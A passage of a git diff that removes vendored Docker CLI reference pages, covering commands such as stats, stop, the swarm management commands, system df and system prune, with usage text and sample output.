-``` - -Remove the stack from the swarm. This command has to be run targeting -a manager node. - -## Related information - -* [stack deploy](stack_deploy.md) -* [stack ls](stack_ls.md) -* [stack ps](stack_ps.md) -* [stack services](stack_services.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_services.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_services.md deleted file mode 100644 index 62779b4aa1..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/stack_services.md +++ /dev/null @@ -1,70 +0,0 @@ ---- -title: "stack services" -description: "The stack services command description and usage" -keywords: "stack, services" -advisory: "experimental" ---- - - - -# stack services (experimental) - -```markdown -Usage: docker stack services [OPTIONS] STACK - -List the services in the stack - -Options: - -f, --filter value Filter output based on conditions provided - --help Print usage - -q, --quiet Only display IDs -``` - -Lists the services that are running as part of the specified stack. This -command has to be run targeting a manager node. - -For example, the following command shows all services in the `myapp` stack: - -```bash -$ docker stack services myapp - -ID NAME REPLICAS IMAGE COMMAND -7be5ei6sqeye myapp_web 1/1 nginx@sha256:23f809e7fd5952e7d5be065b4d3643fbbceccd349d537b62a123ef2201bc886f -dn7m7nhhfb9y myapp_db 1/1 mysql@sha256:a9a5b559f8821fe73d58c3606c812d1c044868d42c63817fa5125fd9d8b7b539 -``` - -## Filtering - -The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there -is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`). -Multiple filter flags are combined as an `OR` filter. - -The following command shows both the `web` and `db` services: - -```bash -$ docker stack services --filter name=myapp_web --filter name=myapp_db myapp - -ID NAME REPLICAS IMAGE COMMAND -7be5ei6sqeye myapp_web 1/1 nginx@sha256:23f809e7fd5952e7d5be065b4d3643fbbceccd349d537b62a123ef2201bc886f -dn7m7nhhfb9y myapp_db 1/1 mysql@sha256:a9a5b559f8821fe73d58c3606c812d1c044868d42c63817fa5125fd9d8b7b539 -``` - -The currently supported filters are: - -* id / ID (`--filter id=7be5ei6sqeye`, or `--filter ID=7be5ei6sqeye`) -* name (`--filter name=myapp_web`) -* label (`--filter label=key=value`) - -## Related information - -* [stack deploy](stack_deploy.md) -* [stack ls](stack_ls.md) -* [stack ps](stack_ps.md) -* [stack rm](stack_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/start.md b/vendor/github.com/docker/docker/docs/reference/commandline/start.md deleted file mode 100644 index 980bce9585..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/start.md +++ /dev/null @@ -1,28 +0,0 @@ ---- -title: "start" -description: "The start command description and usage" -keywords: "Start, container, stopped" ---- - - - -# start - -```markdown -Usage: docker start [OPTIONS] CONTAINER [CONTAINER...] - -Start one or more stopped containers - -Options: - -a, --attach Attach STDOUT/STDERR and forward signals - --detach-keys string Override the key sequence for detaching a container - --help Print usage - -i, --interactive Attach container's STDIN -``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stats.md b/vendor/github.com/docker/docker/docs/reference/commandline/stats.md deleted file mode 100644 index f5d0d54f35..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/stats.md +++ /dev/null @@ -1,117 +0,0 @@ ---- -title: "stats" -description: "The stats command description and usage" -keywords: "container, resource, statistics" ---- - - - -# stats - -```markdown -Usage: docker stats [OPTIONS] [CONTAINER...] - -Display a live stream of container(s) resource usage statistics - -Options: - -a, --all Show all containers (default shows just running) - --format string Pretty-print images using a Go template - --help Print usage - --no-stream Disable streaming stats and only pull the first result -``` - -The `docker stats` command returns a live data stream for running containers. To limit data to one or more specific containers, specify a list of container names or ids separated by a space. You can specify a stopped container but stopped containers do not return any data. - -If you want more detailed information about a container's resource usage, use the `/containers/(id)/stats` API endpoint. - -## Examples - -Running `docker stats` on all running containers against a Linux daemon. - - $ docker stats - CONTAINER CPU % MEM USAGE / LIMIT MEM % NET I/O BLOCK I/O - 1285939c1fd3 0.07% 796 KiB / 64 MiB 1.21% 788 B / 648 B 3.568 MB / 512 KB - 9c76f7834ae2 0.07% 2.746 MiB / 64 MiB 4.29% 1.266 KB / 648 B 12.4 MB / 0 B - d1ea048f04e4 0.03% 4.583 MiB / 64 MiB 6.30% 2.854 KB / 648 B 27.7 MB / 0 B - -Running `docker stats` on multiple containers by name and id against a Linux daemon. - - $ docker stats fervent_panini 5acfcb1b4fd1 - CONTAINER CPU % MEM USAGE/LIMIT MEM % NET I/O - 5acfcb1b4fd1 0.00% 115.2 MiB/1.045 GiB 11.03% 1.422 kB/648 B - fervent_panini 0.02% 11.08 MiB/1.045 GiB 1.06% 648 B/648 B - -Running `docker stats` on all running containers against a Windows daemon. - - PS E:\> docker stats - CONTAINER CPU % PRIV WORKING SET NET I/O BLOCK I/O - 09d3bb5b1604 6.61% 38.21 MiB 17.1 kB / 7.73 kB 10.7 MB / 3.57 MB - 9db7aa4d986d 9.19% 38.26 MiB 15.2 kB / 7.65 kB 10.6 MB / 3.3 MB - 3f214c61ad1d 0.00% 28.64 MiB 64 kB / 6.84 kB 4.42 MB / 6.93 MB - -Running `docker stats` on multiple containers by name and id against a Windows daemon. - - PS E:\> docker ps -a - CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES - 3f214c61ad1d nanoserver "cmd" 2 minutes ago Up 2 minutes big_minsky - 9db7aa4d986d windowsservercore "cmd" 2 minutes ago Up 2 minutes mad_wilson - 09d3bb5b1604 windowsservercore "cmd" 2 minutes ago Up 2 minutes affectionate_easley - - PS E:\> docker stats 3f214c61ad1d mad_wilson - CONTAINER CPU % PRIV WORKING SET NET I/O BLOCK I/O - 3f214c61ad1d 0.00% 46.25 MiB 76.3 kB / 7.92 kB 10.3 MB / 14.7 MB - mad_wilson 9.59% 40.09 MiB 27.6 kB / 8.81 kB 17 MB / 20.1 MB - -## Formatting - -The formatting option (`--format`) pretty prints container output -using a Go template. - -Valid placeholders for the Go template are listed below: - -Placeholder | Description ------------- | -------------------------------------------- -`.Container` | Container name or ID (user input) -`.Name` | Container name -`.ID` | Container ID -`.CPUPerc` | CPU percentage -`.MemUsage` | Memory usage -`.NetIO` | Network IO -`.BlockIO` | Block IO -`.MemPerc` | Memory percentage (Not available on Windows) -`.PIDs` | Number of PIDs (Not available on Windows) - - -When using the `--format` option, the `stats` command either -outputs the data exactly as the template declares or, when using the -`table` directive, includes column headers as well. - -The following example uses a template without headers and outputs the -`Container` and `CPUPerc` entries separated by a colon for all images: - -```bash -$ docker stats --format "{{.Container}}: {{.CPUPerc}}" - -09d3bb5b1604: 6.61% -9db7aa4d986d: 9.19% -3f214c61ad1d: 0.00% -``` - -To list all containers statistics with their name, CPU percentage and memory -usage in a table format you can use: - -```bash -$ docker stats --format "table {{.Container}}\t{{.CPUPerc}}\t{{.MemUsage}}" - -CONTAINER CPU % PRIV WORKING SET -1285939c1fd3 0.07% 796 KiB / 64 MiB -9c76f7834ae2 0.07% 2.746 MiB / 64 MiB -d1ea048f04e4 0.03% 4.583 MiB / 64 MiB -``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stop.md b/vendor/github.com/docker/docker/docs/reference/commandline/stop.md deleted file mode 100644 index 3090db98ae..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/stop.md +++ /dev/null @@ -1,29 +0,0 @@ ---- -title: "stop" -description: "The stop command description and usage" -keywords: "stop, SIGKILL, SIGTERM" ---- - - - -# stop - -```markdown -Usage: docker stop [OPTIONS] CONTAINER [CONTAINER...] - -Stop one or more running containers - -Options: - --help Print usage - -t, --time int Seconds to wait for stop before killing it (default 10) -``` - -The main process inside the container will receive `SIGTERM`, and after a grace -period, `SIGKILL`. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_init.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_init.md deleted file mode 100644 index 44afc27476..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_init.md +++ /dev/null @@ -1,142 +0,0 @@ ---- -title: "swarm init" -description: "The swarm init command description and usage" -keywords: "swarm, init" ---- - - - -# swarm init - -```markdown -Usage: docker swarm init [OPTIONS] - -Initialize a swarm - -Options: - --advertise-addr string Advertised address (format: [:port]) - --autolock Enable manager autolocking (requiring an unlock key to start a stopped manager) - --cert-expiry duration Validity period for node certificates (ns|us|ms|s|m|h) (default 2160h0m0s) - --dispatcher-heartbeat duration Dispatcher heartbeat period (ns|us|ms|s|m|h) (default 5s) - --external-ca external-ca Specifications of one or more certificate signing endpoints - --force-new-cluster Force create a new cluster from current state - --help Print usage - --listen-addr node-addr Listen address (format: [:port]) (default 0.0.0.0:2377) - --max-snapshots uint Number of additional Raft snapshots to retain - --snapshot-interval uint Number of log entries between Raft snapshots (default 10000) - --task-history-limit int Task history retention limit (default 5) -``` - -Initialize a swarm. The docker engine targeted by this command becomes a manager -in the newly created single-node swarm. - - -```bash -$ docker swarm init --advertise-addr 192.168.99.121 -Swarm initialized: current node (bvz81updecsj6wjz393c09vti) is now a manager. - -To add a worker to this swarm, run the following command: - - docker swarm join \ - --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-1awxwuwd3z9j1z3puu7rcgdbx \ - 172.17.0.2:2377 - -To add a manager to this swarm, run 'docker swarm join-token manager' and follow the instructions. -``` - -`docker swarm init` generates two random tokens, a worker token and a manager token. When you join -a new node to the swarm, the node joins as a worker or manager node based upon the token you pass -to [swarm join](swarm_join.md). - -After you create the swarm, you can display or rotate the token using -[swarm join-token](swarm_join_token.md). - -### `--autolock` - -This flag enables automatic locking of managers with an encryption key. The -private keys and data stored by all managers will be protected by the -encryption key printed in the output, and will not be accessible without it. -Thus, it is very important to store this key in order to activate a manager -after it restarts. The key can be passed to `docker swarm unlock` to reactivate -the manager. Autolock can be disabled by running -`docker swarm update --autolock=false`. After disabling it, the encryption key -is no longer required to start the manager, and it will start up on its own -without user intervention. - -### `--cert-expiry` - -This flag sets the validity period for node certificates. - -### `--dispatcher-heartbeat` - -This flag sets the frequency with which nodes are told to use as a -period to report their health. - -### `--external-ca` - -This flag sets up the swarm to use an external CA to issue node certificates. The value takes -the form `protocol=X,url=Y`. The value for `protocol` specifies what protocol should be used -to send signing requests to the external CA. Currently, the only supported value is `cfssl`. -The URL specifies the endpoint where signing requests should be submitted. - -### `--force-new-cluster` - -This flag forces an existing node that was part of a quorum that was lost to restart as a single node Manager without losing its data. - -### `--listen-addr` - -The node listens for inbound swarm manager traffic on this address. The default is to listen on -0.0.0.0:2377. It is also possible to specify a network interface to listen on that interface's -address; for example `--listen-addr eth0:2377`. - -Specifying a port is optional. If the value is a bare IP address or interface -name, the default port 2377 will be used. - -### `--advertise-addr` - -This flag specifies the address that will be advertised to other members of the -swarm for API access and overlay networking. If unspecified, Docker will check -if the system has a single IP address, and use that IP address with the -listening port (see `--listen-addr`). If the system has multiple IP addresses, -`--advertise-addr` must be specified so that the correct address is chosen for -inter-manager communication and overlay networking. - -It is also possible to specify a network interface to advertise that interface's address; -for example `--advertise-addr eth0:2377`. - -Specifying a port is optional. If the value is a bare IP address or interface -name, the default port 2377 will be used. - -### `--task-history-limit` - -This flag sets up task history retention limit. - -### `--max-snapshots` - -This flag sets the number of old Raft snapshots to retain in addition to the -current Raft snapshots. By default, no old snapshots are retained. This option -may be used for debugging, or to store old snapshots of the swarm state for -disaster recovery purposes. - -### `--snapshot-interval` - -This flag specifies how many log entries to allow in between Raft snapshots. -Setting this to a higher number will trigger snapshots less frequently. -Snapshots compact the Raft log and allow for more efficient transfer of the -state to new managers. However, there is a performance cost to taking snapshots -frequently. - -## Related information - -* [swarm join](swarm_join.md) -* [swarm leave](swarm_leave.md) -* [swarm update](swarm_update.md) -* [swarm join-token](swarm_join_token.md) -* [node rm](node_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join.md deleted file mode 100644 index 0cde0d7bcd..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join.md +++ /dev/null @@ -1,102 +0,0 @@ ---- -title: "swarm join" -description: "The swarm join command description and usage" -keywords: "swarm, join" ---- - - - -# swarm join - -```markdown -Usage: docker swarm join [OPTIONS] HOST:PORT - -Join a swarm as a node and/or manager - -Options: - --advertise-addr string Advertised address (format: [:port]) - --help Print usage - --listen-addr node-addr Listen address (format: [:port]) (default 0.0.0.0:2377) - --token string Token for entry into the swarm -``` - -Join a node to a swarm. The node joins as a manager node or worker node based upon the token you -pass with the `--token` flag. If you pass a manager token, the node joins as a manager. If you -pass a worker token, the node joins as a worker. - -### Join a node to swarm as a manager - -The example below demonstrates joining a manager node using a manager token. - -```bash -$ docker swarm join --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-7p73s1dx5in4tatdymyhg9hu2 192.168.99.121:2377 -This node joined a swarm as a manager. -$ docker node ls -ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS -dkp8vy1dq1kxleu9g4u78tlag * manager2 Ready Active Reachable -dvfxp4zseq4s0rih1selh0d20 manager1 Ready Active Leader -``` - -A cluster should only have 3-7 managers at most, because a majority of managers must be available -for the cluster to function. Nodes that aren't meant to participate in this management quorum -should join as workers instead. Managers should be stable hosts that have static IP addresses. - -### Join a node to swarm as a worker - -The example below demonstrates joining a worker node using a worker token. - -```bash -$ docker swarm join --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-1awxwuwd3z9j1z3puu7rcgdbx 192.168.99.121:2377 -This node joined a swarm as a worker. -$ docker node ls -ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS -7ln70fl22uw2dvjn2ft53m3q5 worker2 Ready Active -dkp8vy1dq1kxleu9g4u78tlag worker1 Ready Active Reachable -dvfxp4zseq4s0rih1selh0d20 * manager1 Ready Active Leader -``` - -### `--listen-addr value` - -If the node is a manager, it will listen for inbound swarm manager traffic on this -address. The default is to listen on 0.0.0.0:2377. It is also possible to specify a -network interface to listen on that interface's address; for example `--listen-addr eth0:2377`. - -Specifying a port is optional. If the value is a bare IP address, or interface -name, the default port 2377 will be used. - -This flag is generally not necessary when joining an existing swarm. - -### `--advertise-addr value` - -This flag specifies the address that will be advertised to other members of the -swarm for API access. If unspecified, Docker will check if the system has a -single IP address, and use that IP address with the listening port (see -`--listen-addr`). If the system has multiple IP addresses, `--advertise-addr` -must be specified so that the correct address is chosen for inter-manager -communication and overlay networking. - -It is also possible to specify a network interface to advertise that interface's address; -for example `--advertise-addr eth0:2377`. - -Specifying a port is optional. If the value is a bare IP address, or interface -name, the default port 2377 will be used. - -This flag is generally not necessary when joining an existing swarm. - -### `--token string` - -Secret value required for nodes to join the swarm - - -## Related information - -* [swarm init](swarm_init.md) -* [swarm leave](swarm_leave.md) -* [swarm update](swarm_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join_token.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join_token.md deleted file mode 100644 index d731f028ba..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join_token.md +++ /dev/null @@ -1,105 +0,0 @@ ---- -title: "swarm join-token" -description: "The swarm join-token command description and usage" -keywords: "swarm, join-token" ---- - - - -# swarm join-token - -```markdown -Usage: docker swarm join-token [OPTIONS] (worker|manager) - -Manage join tokens - -Options: - --help Print usage - -q, --quiet Only display token - --rotate Rotate join token -``` - -Join tokens are secrets that allow a node to join the swarm. There are two -different join tokens available, one for the worker role and one for the manager -role. You pass the token using the `--token` flag when you run -[swarm join](swarm_join.md). Nodes use the join token only when they join the -swarm. - -You can view or rotate the join tokens using `swarm join-token`. - -As a convenience, you can pass `worker` or `manager` as an argument to -`join-token` to print the full `docker swarm join` command to join a new node to -the swarm: - -```bash -$ docker swarm join-token worker -To add a worker to this swarm, run the following command: - - docker swarm join \ - --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-1awxwuwd3z9j1z3puu7rcgdbx \ - 172.17.0.2:2377 - -$ docker swarm join-token manager -To add a manager to this swarm, run the following command: - - docker swarm join \ - --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-7p73s1dx5in4tatdymyhg9hu2 \ - 172.17.0.2:2377 -``` - -Use the `--rotate` flag to generate a new join token for the specified role: - -```bash -$ docker swarm join-token --rotate worker -Successfully rotated worker join token. - -To add a worker to this swarm, run the following command: - - docker swarm join \ - --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-b30ljddcqhef9b9v4rs7mel7t \ - 172.17.0.2:2377 -``` - -After using `--rotate`, only the new token will be valid for joining with the specified role. - -The `-q` (or `--quiet`) flag only prints the token: - -```bash -$ docker swarm join-token -q worker - -SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-b30ljddcqhef9b9v4rs7mel7t -``` - -### `--rotate` - -Because tokens allow new nodes to join the swarm, you should keep them secret. -Be particularly careful with manager tokens since they allow new manager nodes -to join the swarm. A rogue manager has the potential to disrupt the operation of -your swarm. - -Rotate your swarm's join token if a token gets checked-in to version control, -stolen, or a node is compromised. You may also want to periodically rotate the -token to ensure any unknown token leaks do not allow a rogue node to join -the swarm. - -To rotate the join token and print the newly generated token, run -`docker swarm join-token --rotate` and pass the role: `manager` or `worker`. - -Rotating a join-token means that no new nodes will be able to join the swarm -using the old token. Rotation does not affect existing nodes in the swarm -because the join token is only used for authorizing new nodes joining the swarm. - -### `--quiet` - -Only print the token. Do not print a complete command for joining. - -## Related information - -* [swarm join](swarm_join.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_leave.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_leave.md deleted file mode 100644 index c0d9437818..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_leave.md +++ /dev/null @@ -1,58 +0,0 @@ ---- -title: "swarm leave" -description: "The swarm leave command description and usage" -keywords: "swarm, leave" ---- - - - -# swarm leave - -```markdown -Usage: docker swarm leave [OPTIONS] - -Leave the swarm - -Options: - -f, --force Force this node to leave the swarm, ignoring warnings - --help Print usage -``` - -When you run this command on a worker, that worker leaves the swarm. - -You can use the `--force` option to on a manager to remove it from the swarm. -However, this does not reconfigure the swarm to ensure that there are enough -managers to maintain a quorum in the swarm. The safe way to remove a manager -from a swarm is to demote it to a worker and then direct it to leave the quorum -without using `--force`. Only use `--force` in situations where the swarm will -no longer be used after the manager leaves, such as in a single-node swarm. - -Consider the following swarm, as seen from the manager: -```bash -$ docker node ls -ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS -7ln70fl22uw2dvjn2ft53m3q5 worker2 Ready Active -dkp8vy1dq1kxleu9g4u78tlag worker1 Ready Active -dvfxp4zseq4s0rih1selh0d20 * manager1 Ready Active Leader -``` - -To remove `worker2`, issue the following command from `worker2` itself: -```bash -$ docker swarm leave -Node left the default swarm. -``` -To remove an inactive node, use the [`node rm`](node_rm.md) command instead. - -## Related information - -* [node rm](node_rm.md) -* [swarm init](swarm_init.md) -* [swarm join](swarm_join.md) -* [swarm update](swarm_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock.md deleted file mode 100644 index 164b7d35a4..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock.md +++ /dev/null @@ -1,41 +0,0 @@ ---- -title: "swarm unlock" -description: "The swarm unlock command description and usage" -keywords: "swarm, unlock" ---- - - - -# swarm unlock - -```markdown -Usage: docker swarm unlock - -Unlock swarm - -Options: - --help Print usage -``` - -Unlocks a locked manager using a user-supplied unlock key. This command must be -used to reactivate a manager after its Docker daemon restarts if the autolock -setting is turned on. The unlock key is printed at the time when autolock is -enabled, and is also available from the `docker swarm unlock-key` command. - - -```bash -$ docker swarm unlock -Please enter unlock key: -``` - -## Related information - -* [swarm init](swarm_init.md) -* [swarm update](swarm_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock_key.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock_key.md deleted file mode 100644 index a2597fe9ab..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock_key.md +++ /dev/null @@ -1,84 +0,0 @@ ---- -title: "swarm unlock-key" -description: "The swarm unlock-keycommand description and usage" -keywords: "swarm, unlock-key" ---- - - - -# swarm unlock-key - -```markdown -Usage: docker swarm unlock-key [OPTIONS] - -Manage the unlock key - -Options: - --help Print usage - -q, --quiet Only display token - --rotate Rotate unlock key -``` - -An unlock key is a secret key needed to unlock a manager after its Docker daemon -restarts. These keys are only used when the autolock feature is enabled for the -swarm. - -You can view or rotate the unlock key using `swarm unlock-key`. To view the key, -run the `docker swarm unlock-key` command without any arguments: - - -```bash -$ docker swarm unlock-key -To unlock a swarm manager after it restarts, run the `docker swarm unlock` -command and provide the following key: - - SWMKEY-1-fySn8TY4w5lKcWcJPIpKufejh9hxx5KYwx6XZigx3Q4 - -Please remember to store this key in a password manager, since without it you -will not be able to restart the manager. -``` - -Use the `--rotate` flag to rotate the unlock key to a new, randomly-generated -key: - -```bash -$ docker swarm unlock-key --rotate -Successfully rotated manager unlock key. - -To unlock a swarm manager after it restarts, run the `docker swarm unlock` -command and provide the following key: - - SWMKEY-1-7c37Cc8654o6p38HnroywCi19pllOnGtbdZEgtKxZu8 - -Please remember to store this key in a password manager, since without it you -will not be able to restart the manager. -``` - -The `-q` (or `--quiet`) flag only prints the key: - -```bash -$ docker swarm unlock-key -q -SWMKEY-1-7c37Cc8654o6p38HnroywCi19pllOnGtbdZEgtKxZu8 -``` - -### `--rotate` - -This flag rotates the unlock key, replacing it with a new randomly-generated -key. The old unlock key will no longer be accepted. - -### `--quiet` - -Only print the unlock key, without instructions. - -## Related information - -* [swarm unlock](swarm_unlock.md) -* [swarm init](swarm_init.md) -* [swarm update](swarm_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_update.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_update.md deleted file mode 100644 index 0af63fe3e0..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_update.md +++ /dev/null @@ -1,45 +0,0 @@ ---- -title: "swarm update" -description: "The swarm update command description and usage" -keywords: "swarm, update" ---- - - - -# swarm update - -```markdown -Usage: docker swarm update [OPTIONS] - -Update the swarm - -Options: - --autolock Change manager autolocking setting (true|false) - --cert-expiry duration Validity period for node certificates (ns|us|ms|s|m|h) (default 2160h0m0s) - --dispatcher-heartbeat duration Dispatcher heartbeat period (ns|us|ms|s|m|h) (default 5s) - --external-ca external-ca Specifications of one or more certificate signing endpoints - --help Print usage - --max-snapshots uint Number of additional Raft snapshots to retain - --snapshot-interval uint Number of log entries between Raft snapshots (default 10000) - --task-history-limit int Task history retention limit (default 5) -``` - -Updates a swarm with new parameter values. This command must target a manager node. - - -```bash -$ docker swarm update --cert-expiry 720h -``` - -## Related information - -* [swarm init](swarm_init.md) -* [swarm join](swarm_join.md) -* [swarm leave](swarm_leave.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/system_df.md b/vendor/github.com/docker/docker/docs/reference/commandline/system_df.md deleted file mode 100644 index c6e8bbdc68..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/system_df.md +++ /dev/null @@ -1,76 +0,0 @@ ---- -title: "system df" -description: "The system df command description and usage" -keywords: "system, data, usage, disk" ---- - - - -# system df - -```markdown -Usage: docker system df [OPTIONS] - -Show docker filesystem usage - -Options: - --help Print usage - -v, --verbose Show detailed information on space usage -``` - -The `docker system df` command displays information regarding the -amount of disk space used by the docker daemon. - -By default the command will just show a summary of the data used: -```bash -$ docker system df -TYPE TOTAL ACTIVE SIZE RECLAIMABLE -Images 5 2 16.43 MB 11.63 MB (70%) -Containers 2 0 212 B 212 B (100%) -Local Volumes 2 1 36 B 0 B (0%) -``` - -A more detailed view can be requested using the `-v, --verbose` flag: -```bash -$ docker system df -v -Images space usage: - -REPOSITORY TAG IMAGE ID CREATED SIZE SHARED SIZE UNIQUE SIZE CONTAINERS -my-curl latest b2789dd875bf 6 minutes ago 11 MB 11 MB 5 B 0 -my-jq latest ae67841be6d0 6 minutes ago 9.623 MB 8.991 MB 632.1 kB 0 - a0971c4015c1 6 minutes ago 11 MB 11 MB 0 B 0 -alpine latest 4e38e38c8ce0 9 weeks ago 4.799 MB 0 B 4.799 MB 1 -alpine 3.3 47cf20d8c26c 9 weeks ago 4.797 MB 4.797 MB 0 B 1 - -Containers space usage: - -CONTAINER ID IMAGE COMMAND LOCAL VOLUMES SIZE CREATED STATUS NAMES -4a7f7eebae0f alpine:latest "sh" 1 0 B 16 minutes ago Exited (0) 5 minutes ago hopeful_yalow -f98f9c2aa1ea alpine:3.3 "sh" 1 212 B 16 minutes ago Exited (0) 48 seconds ago anon-vol - -Local Volumes space usage: - -NAME LINKS SIZE -07c7bdf3e34ab76d921894c2b834f073721fccfbbcba792aa7648e3a7a664c2e 2 36 B -my-named-vol 0 0 B -``` - -* `SHARED SIZE` is the amount of space that an image shares with another one (i.e. their common data) -* `UNIQUE SIZE` is the amount of space that is only used by a given image -* `SIZE` is the virtual size of the image, it is the sum of `SHARED SIZE` and `UNIQUE SIZE` - -Note that network information is not shown because it doesn't consume the disk space. - -## Related Information -* [system prune](system_prune.md) -* [container prune](container_prune.md) -* [volume prune](volume_prune.md) -* [image prune](image_prune.md) -* [network prune](network_prune.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/system_prune.md b/vendor/github.com/docker/docker/docs/reference/commandline/system_prune.md deleted file mode 100644 index 46f8c4364a..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/system_prune.md +++ /dev/null @@ -1,79 +0,0 @@ ---- -title: "system prune" -description: "Remove unused data" -keywords: "system, prune, delete, remove" ---- - - - -# system prune - -```markdown -Usage: docker system prune [OPTIONS] - -Delete unused data - -Options: - -a, --all Remove all unused data not just dangling ones - -f, --force Do not prompt for confirmation - --help Print usage -``` - -Remove all unused containers, volumes, networks and images (both dangling and unreferenced). - -Example output: - -```bash -$ docker system prune -a -WARNING! This will remove: - - all stopped containers - - all volumes not used by at least one container - - all networks not used by at least one container - - all images without at least one container associated to them -Are you sure you want to continue? [y/N] y -Deleted Containers: -0998aa37185a1a7036b0e12cf1ac1b6442dcfa30a5c9650a42ed5010046f195b -73958bfb884fa81fa4cc6baf61055667e940ea2357b4036acbbe25a60f442a4d - -Deleted Volumes: -named-vol - -Deleted Images: -untagged: my-curl:latest -deleted: sha256:7d88582121f2a29031d92017754d62a0d1a215c97e8f0106c586546e7404447d -deleted: sha256:dd14a93d83593d4024152f85d7c63f76aaa4e73e228377ba1d130ef5149f4d8b -untagged: alpine:3.3 -deleted: sha256:695f3d04125db3266d4ab7bbb3c6b23aa4293923e762aa2562c54f49a28f009f -untagged: alpine:latest -deleted: sha256:ee4603260daafe1a8c2f3b78fd760922918ab2441cbb2853ed5c439e59c52f96 -deleted: sha256:9007f5987db353ec398a223bc5a135c5a9601798ba20a1abba537ea2f8ac765f -deleted: sha256:71fa90c8f04769c9721459d5aa0936db640b92c8c91c9b589b54abd412d120ab -deleted: sha256:bb1c3357b3c30ece26e6604aea7d2ec0ace4166ff34c3616701279c22444c0f3 -untagged: my-jq:latest -deleted: sha256:6e66d724542af9bc4c4abf4a909791d7260b6d0110d8e220708b09e4ee1322e1 -deleted: sha256:07b3fa89d4b17009eb3988dfc592c7d30ab3ba52d2007832dffcf6d40e3eda7f -deleted: sha256:3a88a5c81eb5c283e72db2dbc6d65cbfd8e80b6c89bb6e714cfaaa0eed99c548 - -Total reclaimed space: 13.5 MB -``` - -## Related information - -* [volume create](volume_create.md) -* [volume ls](volume_ls.md) -* [volume inspect](volume_inspect.md) -* [volume rm](volume_rm.md) -* [volume prune](volume_prune.md) -* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/) -* [system df](system_df.md) -* [container prune](container_prune.md) -* [image prune](image_prune.md) -* [network prune](network_prune.md) -* [system prune](system_prune.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/tag.md b/vendor/github.com/docker/docker/docs/reference/commandline/tag.md deleted file mode 100644 index 983bfe27b2..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/tag.md +++ /dev/null @@ -1,74 +0,0 @@ ---- -title: "tag" -description: "The tag command description and usage" -keywords: "tag, name, image" ---- - - - -# tag - -```markdown -Usage: docker tag SOURCE_IMAGE[:TAG] TARGET_IMAGE[:TAG] - -Create a tag TARGET_IMAGE that refers to SOURCE_IMAGE - -Options: - --help Print usage -``` - -An image name is made up of slash-separated name components, optionally prefixed -by a registry hostname. The hostname must comply with standard DNS rules, but -may not contain underscores. If a hostname is present, it may optionally be -followed by a port number in the format `:8080`. If not present, the command -uses Docker's public registry located at `registry-1.docker.io` by default. Name -components may contain lowercase characters, digits and separators. A separator -is defined as a period, one or two underscores, or one or more dashes. A name -component may not start or end with a separator. - -A tag name may contain lowercase and uppercase characters, digits, underscores, -periods and dashes. A tag name may not start with a period or a dash and may -contain a maximum of 128 characters. - -You can group your images together using names and tags, and then upload them -to [*Share Images via Repositories*](https://docs.docker.com/engine/tutorials/dockerrepos/#/contributing-to-docker-hub). - -# Examples - -## Tagging an image referenced by ID - -To tag a local image with ID "0e5574283393" into the "fedora" repository with -"version1.0": - - docker tag 0e5574283393 fedora/httpd:version1.0 - -## Tagging an image referenced by Name - -To tag a local image with name "httpd" into the "fedora" repository with -"version1.0": - - docker tag httpd fedora/httpd:version1.0 - -Note that since the tag name is not 